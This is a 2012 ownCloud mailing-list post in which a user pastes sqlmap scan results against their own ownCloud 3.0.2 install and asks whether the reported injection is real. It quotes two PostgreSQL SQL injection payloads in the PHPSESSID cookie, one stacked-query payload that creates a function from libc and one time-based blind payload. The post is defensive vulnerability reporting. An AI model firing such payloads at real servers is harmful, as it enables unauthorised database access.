[Owncloud] This is the actual vulnerability?
saymon
saymon at hub21.ru
Sun May 6 16:41:19 UTC 2012
Hi all.
We decided to check my owncloud different scanners security. When
testing sqlmap faced with the following:
sqlmap identified the following injection points with a total of 16640
HTTP(s) requests:
---
Place: Cookie
Parameter: PHPSESSID
Type: stacked queries
Title: PostgreSQL < 8.2 stacked queries (Glibc)
Payload: PHPSESSID=ispocimq3ns4o9r7ak2u0a6ak0"))); CREATE OR REPLACE
FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C'
STRICT; SELECT sleep(5);-- AND ((("JEUt"="JEUt
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: PHPSESSID=ispocimq3ns4o9r7ak2u0a6ak0"))) AND 1939=(SELECT
1939 FROM PG_SLEEP(5)) AND ((("YsVe"="YsVe
---
This is the actual vulnerability? ownCloud v3.0.2
More information about the Owncloud
mailing list